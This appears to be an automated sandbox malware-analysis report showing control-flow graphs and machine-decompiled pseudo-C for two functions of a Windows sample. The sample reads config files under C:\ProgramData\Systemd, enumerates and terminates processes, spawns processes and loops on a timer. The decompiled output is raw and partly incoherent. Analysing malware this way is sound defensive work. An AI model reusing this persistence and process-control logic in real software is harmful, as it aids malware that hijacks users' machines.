                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 218 7ff6e4c45930-7ff6e4c45a25 call 7ff6e4c64a30 call 7ff6e4c49520 call 7ff6e4c4a9a0 call 7ff6e4c4b100 229 7ff6e4c45a27-7ff6e4c45a31 218->229 230 7ff6e4c45a43-7ff6e4c45a60 call 7ff6e4c4d2d0 call 7ff6e4c4a730 218->230 229->230 234 7ff6e4c45a33-7ff6e4c45a3d 229->234 237 7ff6e4c45a8e-7ff6e4c45ad0 230->237 238 7ff6e4c45a62-7ff6e4c45a89 call 7ff6e4c42b00 230->238 234->230 240 7ff6e4c45ae6-7ff6e4c45af2 237->240 241 7ff6e4c45ad2-7ff6e4c45ae2 call 7ff6e4c4c130 237->241 238->237 243 7ff6e4c45b3a-7ff6e4c45b5b call 7ff6e4c6a670 240->243 244 7ff6e4c45af4-7ff6e4c45afb 240->244 241->240 253 7ff6e4c45b60-7ff6e4c45b6f 243->253 246 7ff6e4c45afd-7ff6e4c45b1d 244->246 247 7ff6e4c45b1f-7ff6e4c45b23 call 7ff6e4c4c2a0 244->247 249 7ff6e4c45b28-7ff6e4c45b2e 246->249 247->249 249->243 252 7ff6e4c45b30-7ff6e4c45b38 249->252 252->244 253->253 254 7ff6e4c45b71-7ff6e4c45bd9 CreateProcessW call 7ff6e4c69c88 GetLastError CloseHandle * 2 253->254 257 7ff6e4c45bdb-7ff6e4c45bf1 254->257 258 7ff6e4c45c11-7ff6e4c45c2a 254->258 259 7ff6e4c45c0c call 7ff6e4c623d0 257->259 260 7ff6e4c45bf3-7ff6e4c45c06 257->260 261 7ff6e4c45c5d-7ff6e4c45d00 call 7ff6e4c49470 call 7ff6e4c61494 call 7ff6e4c623b0 258->261 262 7ff6e4c45c2c-7ff6e4c45c3d 258->262 259->258 260->259 263 7ff6e4c45d07-7ff6e4c45e2d call 7ff6e4c6a5f8 call 7ff6e4c64a30 call 7ff6e4c48490 call 7ff6e4c64a30 call 7ff6e4c49520 call 7ff6e4c4a9a0 call 7ff6e4c4b100 260->263 265 7ff6e4c45c58 call 7ff6e4c623d0 262->265 266 7ff6e4c45c3f-7ff6e4c45c52 262->266 294 7ff6e4c45e4a-7ff6e4c45e76 call 7ff6e4c4d2d0 call 7ff6e4c4a730 263->294 295 7ff6e4c45e2f-7ff6e4c45e38 263->295 265->261 266->265 269 7ff6e4c45d01-7ff6e4c45d06 call 7ff6e4c6a5f8 266->269 269->263 302 7ff6e4c45e78-7ff6e4c45e9e call 7ff6e4c42b00 294->302 303 7ff6e4c45ea3-7ff6e4c45f31 call 7ff6e4c4a9a0 call 7ff6e4c4ab00 294->303 295->294 300 7ff6e4c45e3a-7ff6e4c45e44 295->300 300->294 302->303 309 7ff6e4c45f4a-7ff6e4c45f57 303->309 310 7ff6e4c45f33-7ff6e4c45f45 call 7ff6e4c4c130 303->310 312 7ff6e4c45f59 309->312 313 7ff6e4c45fac-7ff6e4c45fbb 309->313 310->309 314 7ff6e4c45f60-7ff6e4c45f67 312->314 315 7ff6e4c45fc0-7ff6e4c46007 call 7ff6e4c4cca0 313->315 317 7ff6e4c45f69-7ff6e4c45f8c 314->317 318 7ff6e4c45f8e-7ff6e4c45f93 call 7ff6e4c4c2a0 314->318 326 7ff6e4c46009-7ff6e4c46012 315->326 327 7ff6e4c46025-7ff6e4c46045 call 7ff6e4c4d550 315->327 319 7ff6e4c45f98-7ff6e4c45fa3 317->319 318->319 319->313 322 7ff6e4c45fa5-7ff6e4c45faa 319->322 322->314 326->327 331 7ff6e4c46014-7ff6e4c4601f 326->331 332 7ff6e4c46047-7ff6e4c46051 327->332 333 7ff6e4c46080-7ff6e4c4608f call 7ff6e4c4a390 327->333 331->327 334 7ff6e4c4606a-7ff6e4c4607b call 7ff6e4c4bb30 332->334 335 7ff6e4c46053-7ff6e4c46065 call 7ff6e4c49c50 332->335 340 7ff6e4c460bc-7ff6e4c46134 call 7ff6e4c64a30 call 7ff6e4c48490 call 7ff6e4c4cca0 333->340 341 7ff6e4c46091-7ff6e4c460b7 call 7ff6e4c42b00 333->341 334->315 335->315 353 7ff6e4c46136-7ff6e4c46140 340->353 354 7ff6e4c46153-7ff6e4c46170 call 7ff6e4c4d550 call 7ff6e4c4a390 340->354 341->340 353->354 358 7ff6e4c46142-7ff6e4c4614d 353->358 361 7ff6e4c46197-7ff6e4c461a4 call 7ff6e4c45330 354->361 362 7ff6e4c46172-7ff6e4c46192 call 7ff6e4c42b00 354->362 358->354 366 7ff6e4c461a6-7ff6e4c461c8 CloseHandle call 7ff6e4c45470 361->366 367 7ff6e4c461da-7ff6e4c461e8 call 7ff6e4c45470 361->367 362->361 374 7ff6e4c46206-7ff6e4c4620e 366->374 375 7ff6e4c461ca-7ff6e4c461d8 TerminateProcess 366->375 370 7ff6e4c461ed-7ff6e4c461f0 367->370 372 7ff6e4c461fc 370->372 373 7ff6e4c461f2-7ff6e4c461fa call 7ff6e4c45550 370->373 376 7ff6e4c461ff-7ff6e4c46205 CloseHandle 372->376 373->374 378 7ff6e4c46246-7ff6e4c462cd call 7ff6e4c481b0 call 7ff6e4c61494 374->378 379 7ff6e4c46210-7ff6e4c46226 374->379 375->376 376->374 391 7ff6e4c46306-7ff6e4c46322 378->391 392 7ff6e4c462cf-7ff6e4c462e6 378->392 381 7ff6e4c46228-7ff6e4c4623b 379->381 382 7ff6e4c46241 call 7ff6e4c623d0 379->382 381->382 384 7ff6e4c46553-7ff6e4c46558 call 7ff6e4c6a5f8 381->384 382->378 393 7ff6e4c46559-7ff6e4c4655e call 7ff6e4c6a5f8 384->393 397 7ff6e4c46355-7ff6e4c4636d 391->397 398 7ff6e4c46324-7ff6e4c46335 391->398 395 7ff6e4c462e8-7ff6e4c462fb 392->395 396 7ff6e4c46301 call 7ff6e4c623d0 392->396 405 7ff6e4c4655f-7ff6e4c46564 call 7ff6e4c6a5f8 393->405 395->393 395->396 396->391 403 7ff6e4c463a1-7ff6e4c4649d call 7ff6e4c49470 call 7ff6e4c61494 call 7ff6e4c481b0 call 7ff6e4c61494 397->403 404 7ff6e4c4636f-7ff6e4c46380 397->404 401 7ff6e4c46337-7ff6e4c4634a 398->401 402 7ff6e4c46350 call 7ff6e4c623d0 398->402 401->402 401->405 402->397 427 7ff6e4c464d6-7ff6e4c464de 403->427 428 7ff6e4c4649f-7ff6e4c464b5 403->428 408 7ff6e4c4639b-7ff6e4c463a0 call 7ff6e4c623d0 404->408 409 7ff6e4c46382-7ff6e4c46395 404->409 412 7ff6e4c46565-7ff6e4c4656a call 7ff6e4c6a5f8 405->412 408->403 409->408 409->412 421 7ff6e4c4656b-7ff6e4c46570 call 7ff6e4c6a5f8 412->421 429 7ff6e4c46521-7ff6e4c4654c call 7ff6e4c623b0 427->429 430 7ff6e4c464e0-7ff6e4c46505 call 7ff6e4c4cc10 427->430 431 7ff6e4c464b7-7ff6e4c464ca 428->431 432 7ff6e4c464d0-7ff6e4c464d5 call 7ff6e4c623d0 428->432 439 7ff6e4c46507-7ff6e4c4651a 430->439 440 7ff6e4c4651c call 7ff6e4c623d0 430->440 431->421 431->432 432->427 439->440 441 7ff6e4c4654d-7ff6e4c46552 call 7ff6e4c6a5f8 439->441 440->429 441->384
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E00007FF67FF6E4C45930(long long __rbx, void* __rcx, long long __rsi) {
				void* __rdi;
				void* __rbp;
				void* _t131;
				signed char _t137;
				signed char _t156;
				signed char _t157;
				void* _t158;
				intOrPtr* _t163;
				signed long long _t180;
				intOrPtr* _t187;
				intOrPtr* _t188;
				short _t189;
				void* _t193;
				char* _t214;
				void* _t215;
				intOrPtr* _t222;
				intOrPtr* _t226;
				signed long long _t235;
				void* _t262;
				signed long long _t265;
				intOrPtr _t268;
				intOrPtr* _t273;
				void* _t276;
				void* _t278;
				WCHAR* _t279;
				void* _t281;
				signed long long _t282;
				void* _t284;
				long long _t287;
				void* _t290;
				WCHAR* _t293;
				signed long long _t294;
				void* _t296;

				_t211 = __rbx;
				 *((long long*)(_t281 + 0x10)) = __rbx;
				 *((long long*)(_t281 + 0x18)) = __rsi;
				_t279 = _t281 - 0x150;
				_t282 = _t281 - 0x250;
				_t180 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t279[0xa0] = _t180 ^ _t282;
				_t276 = __rcx;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x40], xmm0");
				asm("movups [ebp-0x30], xmm0");
				asm("movups [ebp-0x20], xmm0");
				asm("movups [ebp-0x10], xmm0");
				asm("movups [ebp], xmm0");
				asm("movups [ebp+0x10], xmm0");
				_t279[0x10] = 0;
				asm("movups [esp+0x68], xmm0");
				 *((long long*)(_t282 + 0x78)) = 0;
				 *((long long*)(_t279 - 4)) = 1;
				r8d = 0x110;
				E00007FF67FF6E4C64A30(_t131, _t158,  &(_t279[0x18]), 0, _t284);
				E00007FF67FF6E4C49520(__rbx,  &(_t279[0x18]), "C:\\ProgramData\\Data\\config.txt"); // executed
				 *((char*)(_t282 + 0x50)) = 0;
				r14d = 0;
				 *(_t279 - 0x60) = _t294;
				 *(_t279 - 0x50) = _t294;
				 *((long long*)(_t279 - 0x48)) = 0xf;
				 *(_t279 - 0x60) = r14b;
				_t16 = _t294 + 1; // 0x1
				r8d = _t16;
				E00007FF67FF6E4C4A9A0(_t279 - 0x60, _t282 + 0x50, _t284);
				_t222 =  *((intOrPtr*)( *((intOrPtr*)(_t279 +  *((intOrPtr*)(_t279[0x18] + 4)) + 0x70)) + 8));
				 *((long long*)(_t282 + 0x60)) = _t222;
				_t187 =  *_t222;
				 *((intOrPtr*)(_t187 + 8))();
				_t188 = _t187;
				E00007FF67FF6E4C4B100(_t211, _t282 + 0x58, _t276);
				_t137 =  *((long long*)( *((intOrPtr*)( *_t188 + 0x40))))();
				_t226 =  *((intOrPtr*)(_t282 + 0x60));
				if (_t226 == 0) goto 0xe4c45a43;
				 *((intOrPtr*)( *_t226 + 0x10))();
				if (_t188 == 0) goto 0xe4c45a43;
				_t287 =  *((intOrPtr*)( *_t188));
				_t32 = _t294 + 1; // 0x1
				 *_t287();
				r8d = _t156 & 0x000000ff;
				E00007FF67FF6E4C4D2D0(_t137 & 0x000000ff,  &(_t279[0x18]), _t279 - 0x60, _t276, _t294);
				E00007FF67FF6E4C4A730(_t32, _t137 & 0x000000ff,  &(_t279[0x20]), _t276, _t290, _t273);
				_t163 = _t188;
				if (_t163 != 0) goto 0xe4c45a8e;
				_t189 = _t279[0x18];
				 *((intOrPtr*)(_t189 - 0x7d)) =  *((intOrPtr*)(_t189 - 0x7d)) + _t157;
				if (_t163 >= 0) goto 0xe4c45ac7;
				 *_t273 =  *_t273 + _t157;
				asm("inc ebp");
				asm("adc [ebp+0x33], al");
				dil = dil >> 1;
				 *((long long*)(_t189 - 0x73)) =  *((long long*)(_t189 - 0x73)) - 1;
				_t214 =  >=  ?  *(_t279 - 0x60) : _t279 - 0x60;
				 *(_t279 - 0x80) = _t294;
				 *(_t279 - 0x70) = _t294;
				r8d = 7;
				 *((long long*)(_t279 - 0x68)) = _t287;
				_t262 = _t273 - _t214;
				if (_t262 - 8 < 0) goto 0xe4c45ae6;
				E00007FF67FF6E4C4C130(_t279 - 0x80, _t262, _t273, _t279, _t296);
				_t235 = _t294;
				 *(_t279 - 0x70) = _t235;
				 *((long long*)(_t282 + 0x58)) = _t279 - 0x80;
				if (_t214 == _t273) goto 0xe4c45b3a;
				r9d =  *_t214;
				if (_t235 -  *((intOrPtr*)(_t279 - 0x68)) >= 0) goto 0xe4c45b1f;
				_t54 = _t235 + 1; // 0x1
				 *(_t279 - 0x70) = _t54;
				_t193 =  >=  ?  *(_t279 - 0x80) : _t279 - 0x80;
				 *((intOrPtr*)(_t193 + _t235 * 2)) = r9w;
				 *(_t193 + 2 + _t235 * 2) = r14w;
				goto 0xe4c45b28;
				E00007FF67FF6E4C4C2A0(_t279 - 0x80, _t273, _t279, _t293, _t296);
				_t215 = _t214 + 1;
				if (_t215 == _t273) goto 0xe4c45b3a;
				goto 0xe4c45af4;
				 *((intOrPtr*)(_t193 - 0x75)) =  *((intOrPtr*)(_t193 - 0x75)) + _t157;
				 *(_t193 - 0x7d) =  *(_t193 - 0x7d) | 0x0000007d;
				 *(_t193 + 0xf) =  *(_t193 + 0xf) | _t157;
				 *(_t215 + 0x92cb3a00003ffb8) =  *(_t215 + 0x92cb3a00003ffb8) | 0x0000004c;
				 *( *((intOrPtr*)(_t279 - 0x68)) + _t262) = _t157;
				if (_t157 != 0) goto 0xe4c45b60;
				 *((long long*)(_t282 + 0x48)) = _t282 + 0x68;
				 *((long long*)(_t282 + 0x40)) = _t279 - 0x40;
				 *(_t282 + 0x38) = _t294;
				 *(_t282 + 0x30) = _t294;
				 *((long long*)(_t282 + 0x28)) = 8;
				 *((intOrPtr*)(_t282 + 0x20)) = r14d;
				r9d = 0;
				r8d = 0;
				CreateProcessW(_t293, _t279, _t279, _t279,  *((intOrPtr*)(_t189 + 4)) +  &(_t279[0x18])); // executed
				E00007FF67FF6E4C69C88(_t157, _t32, _t215, _t215, _t278);
				GetLastError();
				CloseHandle(??);
				CloseHandle(??);
				_t265 =  *((intOrPtr*)(_t279 - 0x68));
				if (_t265 - 8 < 0) goto 0xe4c45c11;
				if (2 + _t265 * 2 - 0x1000 < 0) goto 0xe4c45c0c;
				if ( *(_t279 - 0x80) -  *((intOrPtr*)( *(_t279 - 0x80) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c45d07;
				0xe4c623d0();
				 *(_t279 - 0x70) = _t294;
				 *((long long*)(_t279 - 0x68)) = 7;
				 *(_t279 - 0x80) = r14w;
				_t268 =  *((intOrPtr*)(_t279 - 0x48));
				if (_t268 - 0x10 < 0) goto 0xe4c45c5d;
				if (_t268 + 1 - 0x1000 < 0) goto 0xe4c45c58;
				if ( *(_t279 - 0x60) -  *((intOrPtr*)( *(_t279 - 0x60) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c45d01;
				0xe4c623d0();
				 *(_t279 - 0x50) = _t294;
				 *((long long*)(_t279 - 0x48)) = 0xf;
				 *(_t279 - 0x60) = 0;
				 *((long long*)(_t279 +  *((intOrPtr*)(_t279[0x18] + 4)) + 0x30)) = 0xe4c89bc0;
				 *((long long*)(_t279 +  *((intOrPtr*)(_t279[0x18] + 4)) + 0x2c)) =  *((intOrPtr*)(_t279[0x18] + 4)) - 0xb0;
				E00007FF67FF6E4C49470(_t32,  &(_t279[0x20]));
				 *((long long*)(_t279 +  *((intOrPtr*)(_t279[0x18] + 4)) + 0x30)) = 0xe4c89798;
				 *((long long*)(_t279 +  *((intOrPtr*)(_t279[0x18] + 4)) + 0x2c)) =  *((intOrPtr*)(_t279[0x18] + 4)) - 0x18;
				_t279[0x70] = 0xe4c89778;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C61494( &(_t279[0x70])), _t157, _t279[0xa0] ^ _t282);
			}




































                                                                                                                                                              0x7ff6e4c45930
                                                                                                                                                              0x7ff6e4c45930
                                                                                                                                                              0x7ff6e4c45935
                                                                                                                                                              0x7ff6e4c4593e
                                                                                                                                                              0x7ff6e4c45946
                                                                                                                                                              0x7ff6e4c4594d
                                                                                                                                                              0x7ff6e4c45957
                                                                                                                                                              0x7ff6e4c4595e
                                                                                                                                                              0x7ff6e4c45961
                                                                                                                                                              0x7ff6e4c45966
                                                                                                                                                              0x7ff6e4c4596a
                                                                                                                                                              0x7ff6e4c4596e
                                                                                                                                                              0x7ff6e4c45972
                                                                                                                                                              0x7ff6e4c45976
                                                                                                                                                              0x7ff6e4c4597a
                                                                                                                                                              0x7ff6e4c4597e
                                                                                                                                                              0x7ff6e4c45982
                                                                                                                                                              0x7ff6e4c45987
                                                                                                                                                              0x7ff6e4c4598c
                                                                                                                                                              0x7ff6e4c45995
                                                                                                                                                              0x7ff6e4c4599f
                                                                                                                                                              0x7ff6e4c459af
                                                                                                                                                              0x7ff6e4c459b5
                                                                                                                                                              0x7ff6e4c459ba
                                                                                                                                                              0x7ff6e4c459bd
                                                                                                                                                              0x7ff6e4c459c1
                                                                                                                                                              0x7ff6e4c459c5
                                                                                                                                                              0x7ff6e4c459cd
                                                                                                                                                              0x7ff6e4c459d1
                                                                                                                                                              0x7ff6e4c459d1
                                                                                                                                                              0x7ff6e4c459de
                                                                                                                                                              0x7ff6e4c459f1
                                                                                                                                                              0x7ff6e4c459f5
                                                                                                                                                              0x7ff6e4c459fa
                                                                                                                                                              0x7ff6e4c459fd
                                                                                                                                                              0x7ff6e4c45a00
                                                                                                                                                              0x7ff6e4c45a06
                                                                                                                                                              0x7ff6e4c45a17
                                                                                                                                                              0x7ff6e4c45a1d
                                                                                                                                                              0x7ff6e4c45a25
                                                                                                                                                              0x7ff6e4c45a2a
                                                                                                                                                              0x7ff6e4c45a31
                                                                                                                                                              0x7ff6e4c45a36
                                                                                                                                                              0x7ff6e4c45a39
                                                                                                                                                              0x7ff6e4c45a40
                                                                                                                                                              0x7ff6e4c45a43
                                                                                                                                                              0x7ff6e4c45a4f
                                                                                                                                                              0x7ff6e4c45a58
                                                                                                                                                              0x7ff6e4c45a5d
                                                                                                                                                              0x7ff6e4c45a60
                                                                                                                                                              0x7ff6e4c45a62
                                                                                                                                                              0x7ff6e4c45a7a
                                                                                                                                                              0x7ff6e4c45a7d
                                                                                                                                                              0x7ff6e4c45a7f
                                                                                                                                                              0x7ff6e4c45a81
                                                                                                                                                              0x7ff6e4c45a85
                                                                                                                                                              0x7ff6e4c45a8b
                                                                                                                                                              0x7ff6e4c45a8d
                                                                                                                                                              0x7ff6e4c45aac
                                                                                                                                                              0x7ff6e4c45ab1
                                                                                                                                                              0x7ff6e4c45ab8
                                                                                                                                                              0x7ff6e4c45abc
                                                                                                                                                              0x7ff6e4c45ac2
                                                                                                                                                              0x7ff6e4c45ac9
                                                                                                                                                              0x7ff6e4c45ad0
                                                                                                                                                              0x7ff6e4c45ad6
                                                                                                                                                              0x7ff6e4c45adb
                                                                                                                                                              0x7ff6e4c45ade
                                                                                                                                                              0x7ff6e4c45aea
                                                                                                                                                              0x7ff6e4c45af2
                                                                                                                                                              0x7ff6e4c45af4
                                                                                                                                                              0x7ff6e4c45afb
                                                                                                                                                              0x7ff6e4c45afd
                                                                                                                                                              0x7ff6e4c45b01
                                                                                                                                                              0x7ff6e4c45b0d
                                                                                                                                                              0x7ff6e4c45b12
                                                                                                                                                              0x7ff6e4c45b17
                                                                                                                                                              0x7ff6e4c45b1d
                                                                                                                                                              0x7ff6e4c45b23
                                                                                                                                                              0x7ff6e4c45b28
                                                                                                                                                              0x7ff6e4c45b2e
                                                                                                                                                              0x7ff6e4c45b38
                                                                                                                                                              0x7ff6e4c45b43
                                                                                                                                                              0x7ff6e4c45b4a
                                                                                                                                                              0x7ff6e4c45b4f
                                                                                                                                                              0x7ff6e4c45b54
                                                                                                                                                              0x7ff6e4c45b63
                                                                                                                                                              0x7ff6e4c45b6f
                                                                                                                                                              0x7ff6e4c45b76
                                                                                                                                                              0x7ff6e4c45b7f
                                                                                                                                                              0x7ff6e4c45b84
                                                                                                                                                              0x7ff6e4c45b89
                                                                                                                                                              0x7ff6e4c45b8e
                                                                                                                                                              0x7ff6e4c45b96
                                                                                                                                                              0x7ff6e4c45b9b
                                                                                                                                                              0x7ff6e4c45b9e
                                                                                                                                                              0x7ff6e4c45ba7
                                                                                                                                                              0x7ff6e4c45bb0
                                                                                                                                                              0x7ff6e4c45bb5
                                                                                                                                                              0x7ff6e4c45bc0
                                                                                                                                                              0x7ff6e4c45bcb
                                                                                                                                                              0x7ff6e4c45bd1
                                                                                                                                                              0x7ff6e4c45bd9
                                                                                                                                                              0x7ff6e4c45bf1
                                                                                                                                                              0x7ff6e4c45c06
                                                                                                                                                              0x7ff6e4c45c0c
                                                                                                                                                              0x7ff6e4c45c11
                                                                                                                                                              0x7ff6e4c45c15
                                                                                                                                                              0x7ff6e4c45c1d
                                                                                                                                                              0x7ff6e4c45c22
                                                                                                                                                              0x7ff6e4c45c2a
                                                                                                                                                              0x7ff6e4c45c3d
                                                                                                                                                              0x7ff6e4c45c52
                                                                                                                                                              0x7ff6e4c45c58
                                                                                                                                                              0x7ff6e4c45c5d
                                                                                                                                                              0x7ff6e4c45c61
                                                                                                                                                              0x7ff6e4c45c69
                                                                                                                                                              0x7ff6e4c45c7c
                                                                                                                                                              0x7ff6e4c45c8f
                                                                                                                                                              0x7ff6e4c45c97
                                                                                                                                                              0x7ff6e4c45cab
                                                                                                                                                              0x7ff6e4c45cbb
                                                                                                                                                              0x7ff6e4c45cc6
                                                                                                                                                              0x7ff6e4c45d00

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$Process32$CreateNextProcess$ErrorFirstLastLockitLockit::_SnapshotTerminateToolhelp32__std_exception_copystd::_
                                                                                                                                                              • String ID: $C:\ProgramData\Data\config.txt$C:\ProgramData\Systemd\$C:\ProgramData\Systemd\config.txt$C:\ProgramData\Systemd\name.txt$C:\ProgramData\Systemd\process.txt
                                                                                                                                                              • API String ID: 3432791168-3231106152
                                                                                                                                                              • Opcode ID: cb6e9143fb10527f0cc2c556a89f50714ed5a4d06e73ce823364a430e20d7582
                                                                                                                                                              • Instruction ID: a64371d62b74321c15911887ba2845701201fd697ca55f251cbe2b7757d6d871
                                                                                                                                                              • Opcode Fuzzy Hash: cb6e9143fb10527f0cc2c556a89f50714ed5a4d06e73ce823364a430e20d7582
                                                                                                                                                              • Instruction Fuzzy Hash: 08725537B14B8685EB10CF75D8943AC37B1FB88B88F508126DA0D97AA9DF3AD542C705
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C46620 Relevance: 25.0, APIs: 10, Strings: 4, Instructions: 524COMMONCrypto
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 594 7ff6e4c46620-7ff6e4c4673d call 7ff6e4c64a30 call 7ff6e4c48490 call 7ff6e4c64a30 call 7ff6e4c49520 call 7ff6e4c4a9a0 call 7ff6e4c4b100 609 7ff6e4c4675a-7ff6e4c46786 call 7ff6e4c4d2d0 call 7ff6e4c4a730 594->609 610 7ff6e4c4673f-7ff6e4c46748 594->610 617 7ff6e4c46788-7ff6e4c467ae call 7ff6e4c42b00 609->617 618 7ff6e4c467b3-7ff6e4c46841 call 7ff6e4c4a9a0 call 7ff6e4c4ab00 609->618 610->609 614 7ff6e4c4674a-7ff6e4c46754 610->614 614->609 617->618 624 7ff6e4c4685a-7ff6e4c46867 618->624 625 7ff6e4c46843-7ff6e4c46855 call 7ff6e4c4c130 618->625 627 7ff6e4c46869 624->627 628 7ff6e4c468bc-7ff6e4c468cb 624->628 625->624 630 7ff6e4c46870-7ff6e4c46877 627->630 631 7ff6e4c468d0-7ff6e4c46917 call 7ff6e4c4cca0 628->631 632 7ff6e4c46879-7ff6e4c4689c 630->632 633 7ff6e4c4689e-7ff6e4c468a3 call 7ff6e4c4c2a0 630->633 641 7ff6e4c46919-7ff6e4c46922 631->641 642 7ff6e4c46935-7ff6e4c46955 call 7ff6e4c4d550 631->642 634 7ff6e4c468a8-7ff6e4c468b3 632->634 633->634 634->628 637 7ff6e4c468b5-7ff6e4c468ba 634->637 637->630 641->642 646 7ff6e4c46924-7ff6e4c4692f 641->646 647 7ff6e4c46957-7ff6e4c46961 642->647 648 7ff6e4c46990-7ff6e4c4699f call 7ff6e4c4a390 642->648 646->642 650 7ff6e4c4697a-7ff6e4c4698b call 7ff6e4c4bb30 647->650 651 7ff6e4c46963-7ff6e4c46975 call 7ff6e4c49c50 647->651 656 7ff6e4c469cc-7ff6e4c46a44 call 7ff6e4c64a30 call 7ff6e4c48490 call 7ff6e4c4cca0 648->656 657 7ff6e4c469a1-7ff6e4c469c7 call 7ff6e4c42b00 648->657 650->631 651->631 668 7ff6e4c46a46-7ff6e4c46a50 656->668 669 7ff6e4c46a63-7ff6e4c46a80 call 7ff6e4c4d550 call 7ff6e4c4a390 656->669 657->656 668->669 673 7ff6e4c46a52-7ff6e4c46a5d 668->673 676 7ff6e4c46aa7-7ff6e4c46ab4 call 7ff6e4c45330 669->676 677 7ff6e4c46a82-7ff6e4c46aa2 call 7ff6e4c42b00 669->677 673->669 681 7ff6e4c46ab6-7ff6e4c46ad8 CloseHandle call 7ff6e4c45470 676->681 682 7ff6e4c46aea-7ff6e4c46b00 call 7ff6e4c45470 676->682 677->676 687 7ff6e4c46b16-7ff6e4c46b1e 681->687 688 7ff6e4c46ada-7ff6e4c46ae8 TerminateProcess 681->688 689 7ff6e4c46b0c 682->689 690 7ff6e4c46b02-7ff6e4c46b05 call 7ff6e4c45930 682->690 693 7ff6e4c46b56-7ff6e4c46bdd call 7ff6e4c481b0 call 7ff6e4c61494 687->693 694 7ff6e4c46b20-7ff6e4c46b36 687->694 691 7ff6e4c46b0f-7ff6e4c46b15 CloseHandle 688->691 689->691 696 7ff6e4c46b0a 690->696 691->687 707 7ff6e4c46c16-7ff6e4c46c32 693->707 708 7ff6e4c46bdf-7ff6e4c46bf6 693->708 697 7ff6e4c46b38-7ff6e4c46b4b 694->697 698 7ff6e4c46b51 call 7ff6e4c623d0 694->698 696->687 697->698 699 7ff6e4c46e63-7ff6e4c46e68 call 7ff6e4c6a5f8 697->699 698->693 706 7ff6e4c46e69-7ff6e4c46e6e call 7ff6e4c6a5f8 699->706 723 7ff6e4c46e6f-7ff6e4c46e74 call 7ff6e4c6a5f8 706->723 712 7ff6e4c46c65-7ff6e4c46c7d 707->712 713 7ff6e4c46c34-7ff6e4c46c45 707->713 710 7ff6e4c46bf8-7ff6e4c46c0b 708->710 711 7ff6e4c46c11 call 7ff6e4c623d0 708->711 710->706 710->711 711->707 714 7ff6e4c46cb1-7ff6e4c46dad call 7ff6e4c49470 call 7ff6e4c61494 call 7ff6e4c481b0 call 7ff6e4c61494 712->714 715 7ff6e4c46c7f-7ff6e4c46c90 712->715 718 7ff6e4c46c47-7ff6e4c46c5a 713->718 719 7ff6e4c46c60 call 7ff6e4c623d0 713->719 744 7ff6e4c46de6-7ff6e4c46dee 714->744 745 7ff6e4c46daf-7ff6e4c46dc5 714->745 720 7ff6e4c46cab-7ff6e4c46cb0 call 7ff6e4c623d0 715->720 721 7ff6e4c46c92-7ff6e4c46ca5 715->721 718->719 718->723 719->712 720->714 721->720 725 7ff6e4c46e75-7ff6e4c46e7a call 7ff6e4c6a5f8 721->725 723->725 736 7ff6e4c46e7b-7ff6e4c46e90 call 7ff6e4c6a5f8 725->736 741 7ff6e4c46e94-7ff6e4c46ea9 call 7ff6e4c45d10 call 7ff6e4c46620 SleepEx 736->741 749 7ff6e4c46e31-7ff6e4c46e5c call 7ff6e4c623b0 744->749 750 7ff6e4c46df0-7ff6e4c46e15 call 7ff6e4c4cc10 744->750 746 7ff6e4c46dc7-7ff6e4c46dda 745->746 747 7ff6e4c46de0-7ff6e4c46de5 call 7ff6e4c623d0 745->747 746->736 746->747 747->744 759 7ff6e4c46e17-7ff6e4c46e2a 750->759 760 7ff6e4c46e2c call 7ff6e4c623d0 750->760 759->760 761 7ff6e4c46e5d-7ff6e4c46e62 call 7ff6e4c6a5f8 759->761 760->749 761->699
                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                              			E00007FF67FF6E4C46620(void* __ecx, void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* __r14;
				void* __r15;
				void* _t251;
				void* _t253;
				signed char _t259;
				void* _t263;
				signed short _t271;
				void* _t277;
				void* _t278;
				signed short _t283;
				void* _t287;
				void* _t301;
				void* _t302;
				signed short _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t313;
				void* _t314;
				signed long long _t363;
				intOrPtr* _t370;
				intOrPtr* _t371;
				void* _t378;
				intOrPtr* _t381;
				intOrPtr* _t382;
				intOrPtr _t383;
				long long* _t389;
				long long* _t390;
				long long _t392;
				char* _t434;
				intOrPtr* _t447;
				intOrPtr* _t451;
				signed long long _t462;
				intOrPtr* _t466;
				intOrPtr* _t470;
				intOrPtr* _t482;
				intOrPtr* _t486;
				intOrPtr _t531;
				void* _t546;
				signed long long _t563;
				signed long long _t568;
				intOrPtr _t571;
				intOrPtr _t574;
				signed long long _t581;
				void* _t592;
				void* _t602;
				intOrPtr* _t603;
				void* _t605;
				signed long long _t606;
				void* _t608;
				long long _t611;
				void* _t620;
				void* _t622;
				signed long long _t623;
				void* _t625;

				_t597 = __rsi;
				_t431 = __rbx;
				_t305 = __ecx;
